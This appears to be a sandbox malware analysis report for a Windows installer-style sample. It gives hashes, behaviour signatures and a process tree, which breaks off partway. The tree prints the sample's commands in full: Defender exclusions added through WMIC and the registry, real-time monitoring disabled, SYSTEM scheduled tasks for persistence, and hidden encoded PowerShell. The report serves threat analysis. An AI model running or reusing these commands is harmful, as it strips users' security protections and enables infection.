Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    241s
  • max time network
    242s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    11/07/2024, 22:30

General

  • Target

    1198dc190ed27298129983e6218e63c279482b34adf78706247b054da569769a.exe

  • Size

    7.3MB

  • MD5

    558ae61d8bde0d3b462d107bfa97dbf9

  • SHA1

    7dabedf987662afcdc130789fea9160a7cd691f7

  • SHA256

    1198dc190ed27298129983e6218e63c279482b34adf78706247b054da569769a

  • SHA512

    ed03d407c4a6cf86811b41b2a98507d1761fe973090528e3626220993cf79426192f140f5ef484006f7df9356f3681ae619ca3b7361f3e6c110de627cf4ba956

  • SSDEEP

    196608:91OQ1cb5pCftP4ejDeulXsZWddPgQA+umWKYlUNAcJX:3OQ1cbfCh4IJlXZ1zWcNlJX

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Windows security bypass 2 TTPs 40 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell and hide display window.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 23 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops file in System32 directory 24 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 12 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 30 IoCs
  • Suspicious use of AdjustPrivilegeToken 63 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\1198dc190ed27298129983e6218e63c279482b34adf78706247b054da569769a.exe
    "C:\Users\Admin\AppData\Local\Temp\1198dc190ed27298129983e6218e63c279482b34adf78706247b054da569769a.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2632
    • C:\Users\Admin\AppData\Local\Temp\7zSE59E.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2332
      • C:\Users\Admin\AppData\Local\Temp\7zSE87B.tmp\Install.exe
        .\Install.exe /swgdidCpK "525403" /S
        3⤵
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Loads dropped DLL
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:2824
        • C:\Windows\SysWOW64\forfiles.exe
          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m calc.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2596
          • C:\Windows\SysWOW64\cmd.exe
            /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2584
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Drops file in System32 directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2592
              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                7⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:1636
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /CREATE /TN "bYIjjyXTgczhZAJGMW" /SC once /ST 22:32:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ClVBtfBcTpyyeRnZp\nvWBhgZuGqtwSPP\vxubuTV.exe\" om /ndidKuD 525403 /S" /V1 /F
          4⤵
          • Drops file in Windows directory
          • Scheduled Task/Job: Scheduled Task
          PID:1868
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2824 -s 508
          4⤵
          • Loads dropped DLL
          • Program crash
          PID:1564
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {2698CCAF-85F0-4A5B-86C1-8727C3D5F636} S-1-5-18:NT AUTHORITY\System:Service:
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2912
    • C:\Users\Admin\AppData\Local\Temp\ClVBtfBcTpyyeRnZp\nvWBhgZuGqtwSPP\vxubuTV.exe
      C:\Users\Admin\AppData\Local\Temp\ClVBtfBcTpyyeRnZp\nvWBhgZuGqtwSPP\vxubuTV.exe om /ndidKuD 525403 /S
      2⤵
      • Executes dropped EXE
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      • Suspicious use of WriteProcessMemory
      PID:2944
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /CREATE /TN "gOgfPLsCt" /SC once /ST 05:06:20 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:1692
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /run /I /tn "gOgfPLsCt"
        3⤵
          PID:2340
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /DELETE /F /TN "gOgfPLsCt"
          3⤵
            PID:1632
          • C:\Windows\SysWOW64\cmd.exe
            cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
            3⤵
              PID:1000
              • C:\Windows\SysWOW64\reg.exe
                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                4⤵
                • Modifies Windows Defender Real-time Protection settings
                PID:2412
            • C:\Windows\SysWOW64\cmd.exe
              cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
              3⤵
                PID:2980
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                  4⤵
                  • Modifies Windows Defender Real-time Protection settings
                  PID:1448
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /CREATE /TN "gauLKlHCQ" /SC once /ST 01:47:31 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                3⤵
                • Scheduled Task/Job: Scheduled Task
                PID:2192
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /run /I /tn "gauLKlHCQ"
                3⤵
                  PID:308
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /DELETE /F /TN "gauLKlHCQ"
                  3⤵
                    PID:2680
                  • C:\Windows\SysWOW64\forfiles.exe
                    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
                    3⤵
                      PID:2992
                      • C:\Windows\SysWOW64\cmd.exe
                        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                        4⤵
                          PID:2692
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                            5⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Drops file in System32 directory
                            • Modifies data under HKEY_USERS
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2852
                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                              6⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2536
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RkUDfeHyKRZhrXlO" /t REG_DWORD /d 0 /reg:32
                        3⤵
                          PID:2116
                          • C:\Windows\SysWOW64\reg.exe
                            REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RkUDfeHyKRZhrXlO" /t REG_DWORD /d 0 /reg:32
                            4⤵
                            • Windows security bypass
                            PID:1124
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RkUDfeHyKRZhrXlO" /t REG_DWORD /d 0 /reg:64
                          3⤵
                            PID:1724
                            • C:\Windows\SysWOW64\reg.exe
                              REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RkUDfeHyKRZhrXlO" /t REG_DWORD /d 0 /reg:64
                              4⤵
                              • Windows security bypass
                              PID:1340
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RkUDfeHyKRZhrXlO" /t REG_DWORD /d 0 /reg:32
                            3⤵
                              PID:2084
                              • C:\Windows\SysWOW64\reg.exe
                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RkUDfeHyKRZhrXlO" /t REG_DWORD /d 0 /reg:32
                                4⤵
                                  PID:2572
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RkUDfeHyKRZhrXlO" /t REG_DWORD /d 0 /reg:64
                                3⤵
                                  PID:2552
                                  • C:\Windows\SysWOW64\reg.exe
                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RkUDfeHyKRZhrXlO" /t REG_DWORD /d 0 /reg:64
                                    4⤵
                                      PID:2384
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /C copy nul "C:\Windows\Temp\RkUDfeHyKRZhrXlO\rBYzbNNR\tdSEkcoOyyjmRDMf.wsf"
                                    3⤵
                                      PID:2920
                                    • C:\Windows\SysWOW64\wscript.exe
                                      wscript "C:\Windows\Temp\RkUDfeHyKRZhrXlO\rBYzbNNR\tdSEkcoOyyjmRDMf.wsf"
                                      3⤵
                                      • Modifies data under HKEY_USERS
                                      PID:1248
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NFFblPWVSTUU2" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:2112
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NFFblPWVSTUU2" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:2400
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OniiUkVuU" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:1640
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OniiUkVuU" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:1596
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YKxKHFRmqrfWRbNUYLR" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:2776
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YKxKHFRmqrfWRbNUYLR" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:2600
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eveqWKwISMUn" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:920
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eveqWKwISMUn" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:1228
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oMPLyiqsgsRtC" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:3048
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oMPLyiqsgsRtC" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:984
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\RfQdYYQjhFJxkqVB" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:828
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\RfQdYYQjhFJxkqVB" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:800
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:2064
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:2300
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ClVBtfBcTpyyeRnZp" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:532
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ClVBtfBcTpyyeRnZp" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:2024
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RkUDfeHyKRZhrXlO" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:2240
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RkUDfeHyKRZhrXlO" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:2248
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NFFblPWVSTUU2" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                          PID:2420
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NFFblPWVSTUU2" /t REG_DWORD /d 0 /reg:64
                                          4⤵
                                            PID:2856
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OniiUkVuU" /t REG_DWORD /d 0 /reg:32
                                            4⤵
                                              PID:1276
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OniiUkVuU" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                                PID:1644
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YKxKHFRmqrfWRbNUYLR" /t REG_DWORD /d 0 /reg:32
                                                4⤵
                                                  PID:2352
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YKxKHFRmqrfWRbNUYLR" /t REG_DWORD /d 0 /reg:64
                                                  4⤵
                                                    PID:1688
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eveqWKwISMUn" /t REG_DWORD /d 0 /reg:32
                                                    4⤵
                                                      PID:1764
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eveqWKwISMUn" /t REG_DWORD /d 0 /reg:64
                                                      4⤵
                                                        PID:1656
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oMPLyiqsgsRtC" /t REG_DWORD /d 0 /reg:32
                                                        4⤵
                                                          PID:3020
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oMPLyiqsgsRtC" /t REG_DWORD /d 0 /reg:64
                                                          4⤵
                                                            PID:1804
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\RfQdYYQjhFJxkqVB" /t REG_DWORD /d 0 /reg:32
                                                            4⤵
                                                              PID:1928
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\RfQdYYQjhFJxkqVB" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                                PID:804
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                4⤵
                                                                  PID:2060
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                  4⤵
                                                                    PID:2460
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ClVBtfBcTpyyeRnZp" /t REG_DWORD /d 0 /reg:32
                                                                    4⤵
                                                                      PID:1476
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ClVBtfBcTpyyeRnZp" /t REG_DWORD /d 0 /reg:64
                                                                      4⤵
                                                                        PID:2252
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RkUDfeHyKRZhrXlO" /t REG_DWORD /d 0 /reg:32
                                                                        4⤵
                                                                          PID:1264
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RkUDfeHyKRZhrXlO" /t REG_DWORD /d 0 /reg:64
                                                                          4⤵
                                                                            PID:1484
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          schtasks /CREATE /TN "gDePgTIlG" /SC once /ST 04:29:10 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                          3⤵
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:1524
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          schtasks /run /I /tn "gDePgTIlG"
                                                                          3⤵
                                                                            PID:264
                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                            schtasks /DELETE /F /TN "gDePgTIlG"
                                                                            3⤵
                                                                              PID:2572
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                              3⤵
                                                                                PID:2276
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                                  4⤵
                                                                                    PID:2552
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                  3⤵
                                                                                    PID:2768
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                      4⤵
                                                                                        PID:2964
                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                      schtasks /CREATE /TN "akamOyUwOLVWEybrw" /SC once /ST 20:20:57 /RU "SYSTEM" /TR "\"C:\Windows\Temp\RkUDfeHyKRZhrXlO\WooAMnjmsKoKBAB\oNEGcQe.exe\" 0O /GrsXdidIC 525403 /S" /V1 /F
                                                                                      3⤵
                                                                                      • Drops file in Windows directory
                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                      PID:2580
                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                      schtasks /run /I /tn "akamOyUwOLVWEybrw"
                                                                                      3⤵
                                                                                        PID:1940
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2944 -s 256
                                                                                        3⤵
                                                                                        • Loads dropped DLL
                                                                                        • Program crash
                                                                                        PID:2020
                                                                                    • C:\Windows\Temp\RkUDfeHyKRZhrXlO\WooAMnjmsKoKBAB\oNEGcQe.exe
                                                                                      C:\Windows\Temp\RkUDfeHyKRZhrXlO\WooAMnjmsKoKBAB\oNEGcQe.exe 0O /GrsXdidIC 525403 /S
                                                                                      2⤵
                                                                                      • Checks computer location settings
                                                                                      • Executes dropped EXE
                                                                                      • Drops Chrome extension
                                                                                      • Drops file in System32 directory
                                                                                      • Drops file in Program Files directory
                                                                                      • Modifies data under HKEY_USERS
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      PID:1640
                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                        schtasks /DELETE /F /TN "bYIjjyXTgczhZAJGMW"
                                                                                        3⤵
                                                                                          PID:2600
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
                                                                                          3⤵
                                                                                            PID:2152
                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                              forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                              4⤵
                                                                                                PID:1404
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                  5⤵
                                                                                                    PID:2788
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                      6⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Drops file in System32 directory
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:2864
                                                                                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
